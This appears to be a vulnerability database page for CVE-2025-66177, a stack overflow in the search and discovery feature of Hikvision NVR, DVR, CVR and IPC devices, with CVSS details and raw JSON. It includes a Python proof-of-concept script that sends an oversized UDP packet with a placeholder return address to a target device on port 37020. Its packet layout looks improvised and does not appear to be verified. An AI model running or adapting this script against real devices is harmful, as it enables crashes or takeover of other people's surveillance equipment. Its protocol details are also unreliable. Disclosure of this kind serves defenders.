Security Vulnerability Report
CVE-2025-66177 CVSS 8.8 HIGH

Published: 2026-01-13 03:16:01
Last Modified: 2026-04-15 00:35:42

Description

There is a stack overflow vulnerability in the device Search and Discovery feature of Hikvision NVR/DVR/CVR/IPC models. If exploited, an attacker on the same local area network (LAN) could cause the device to malfunction by sending specially crafted packets to an unpatched device.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Hikvision NVR (some unpatched versions)
Hikvision DVR (some unpatched versions)
Hikvision CVR (some unpatched versions)
Hikvision IPC (some unpatched versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-66177 PoC - Hikvision Device Search Stack Overflow
Note: This PoC is for educational and authorized testing purposes only.
"""
import socket
import struct
import sys


def create_exploit_packet():
    """Construct malicious device search response packet"""
    # Device Search Protocol header
    header = b'\x00\x00\x00\x00'  # Protocol version
    packet_type = b'\x01\x00'  # Response packet type

    # Overflow payload - trigger stack overflow
    # Sending oversized device info field
    overflow_length = 2000  # Exceed buffer size
    overflow_payload = b'A' * overflow_length

    # Malicious return address (to be customized based on target)
    return_addr = struct.pack('<I', 0x41414141)  # Placeholder address

    # Construct packet with overflow data
    packet = header + packet_type
    packet += struct.pack('<H', overflow_length)  # Length field
    packet += overflow_payload + return_addr
    return packet


def send_exploit(target_ip, target_port=37020):
    """Send exploit packet to target device"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    exploit_packet = create_exploit_packet()
    try:
        print(f"[*] Sending exploit to {target_ip}:{target_port}")
        sock.sendto(exploit_packet, (target_ip, target_port))
        print(f"[+] Exploit packet sent ({len(exploit_packet)} bytes)")
        print("[!] If vulnerable, device may crash or allow code execution")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    send_exploit(sys.argv[1])

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66177", "sourceIdentifier": "[email protected]", "published": "2026-01-13T03:16:01.250", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a Stack overflow Vulnerability in the device Search and Discovery feature of Hikvision NVR/DVR/CVR/IPC models. If exploited, an attacker on the same local area network (LAN) could cause the device to malfunction by sending specially crafted packets to an unpatched device."}, {"lang": "es", "value": "Hay una vulnerabilidad de desbordamiento de pila en la función de Búsqueda y Descubrimiento de dispositivos de los modelos Hikvision NVR/DVR/CVR/IPC. Si se explota, un atacante en la misma red de área local (LAN) podría causar que el dispositivo funcione mal enviando paquetes especialmente diseñados a un dispositivo sin parchear."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://www.hikvision.com/en/support/cybersecurity/security-advisory/buffer-overflow-vulnerabilities-in-some-hikvision-products/", "source": "[email protected]"}]}}